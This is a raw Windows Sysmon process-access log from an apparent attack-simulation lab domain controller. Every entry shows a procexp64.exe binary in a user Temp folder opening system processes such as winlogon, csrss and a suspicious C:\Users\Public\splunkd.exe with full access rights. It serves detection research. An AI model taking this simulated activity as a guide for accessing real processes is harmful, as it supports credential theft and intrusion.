15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789577Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789576Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789575Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789574Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789573Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789572Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789571Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789570Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789569Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789568Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789567Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789566Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789565Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789564Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789563Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789562Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789561Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789560Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789559Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789558Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789557Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789556Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789555Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789554Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789553Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789552Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789551Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789550Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789549Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789548Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789547Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789546Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789545Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789544Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789543Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789542Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789541Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789540Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 